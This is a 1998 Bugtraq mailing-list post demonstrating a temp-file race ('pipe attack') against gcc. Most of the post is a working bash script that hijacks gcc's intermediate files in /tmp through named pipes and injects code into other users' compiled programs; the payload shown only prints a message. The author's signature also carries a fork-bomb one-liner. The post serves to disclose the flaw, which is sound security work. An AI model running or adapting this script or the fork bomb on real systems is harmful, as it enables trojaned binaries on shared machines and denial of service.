[6138] in bugtraq
Pipe attack - an example
daemon@ATHENA.MIT.EDU (=?UNKNOWN-8BIT?Q?Micha=B3?= Zalews)
Fri Feb 20 14:26:11 1998
Date: Fri, 20 Feb 1998 18:46:47 +0100
Reply-To: =?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
From: =?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
To: BUGTRAQ@NETSPACE.ORG
Due to the questions about possibility of performing 'pipe attacks'
- there's *working* example of program, which appends function
printf("This program has been infected!\n"); after declarations
in the main() function to sources compiled using gcc. That IS serious
problem, isn't it? Of course, of course, this one (gcc vunerability)
can be easily patched, but gcc isn't the only one vunerable program!
Ok, here it is:
--
#!/bin/bash
# Advanced gcc viral implant
# by Michal Zalewski (lcamtuf@staszic.waw.pl)
# ** EXECUTION PROHIBITED **
CC1=3D`find /usr/lib/gcc-lib -name cc1`
VICT=3D0
renice +20 $PPID >&/dev/null
cd /tmp
echo "I'm free, I'm free! Oh, I'm free..."
while :; do
V=3D`ls cc*.i 2>/dev/null|cut -f 1 -d "."`
if [ ! "$V" =3D "" ]; then
mkfifo -m 666 ${V}.s &>/dev/null
if [ -p ${V}.s ]; then
sleep 1
cat ${V}.i|awk 'match($2,"main")=3D=3D1{x=3D1};y!=3D1&&x=3D=3D1&&=
match($1,"(">0){y=3D1;print "printf(\"This program has been infected!\\=
n\");"};{print $0}'>.lv$$.i
$CC1 .lv$$.i
cat ${V}.s>/dev/null
cat .lv$$.s >${V}.s
let VICT=3DVICT+1
echo "Someone has been just trapped ($VICT)."
fi
rm -f .lv$$.* ${V}.s &>/dev/null
fi
done
--
_______________________________________________________________________
Micha=B3 Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.p=
l]
Iterowa=E6 jest rzecz=B1 ludzk=B1, wykonywa=E6 rekursywnie - bosk=B1 [P=
. Deustch]
=3D--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] ----------------=
-=3D
